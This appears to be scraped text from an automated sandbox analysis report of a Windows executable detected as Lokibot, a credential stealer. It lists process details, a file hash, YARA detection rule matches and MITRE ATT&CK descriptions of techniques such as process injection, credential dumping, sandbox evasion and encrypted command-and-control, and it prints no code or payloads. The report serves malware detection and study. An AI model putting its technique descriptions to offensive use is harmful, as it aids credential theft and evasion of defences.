Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: aZOmps0Ug8.exe PID: 3980 Parent PID: 6780

General

Start time:	08:28:12
Start date:	14/10/2021
Path:	C:\Users\user\Desktop\aZOmps0Ug8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\aZOmps0Ug8.exe'
Imagebase:	0x400000
File size:	283552 bytes
MD5 hash:	70D177ABC7455C709AE9710630B9EA49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report aZOmps0Ug8

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre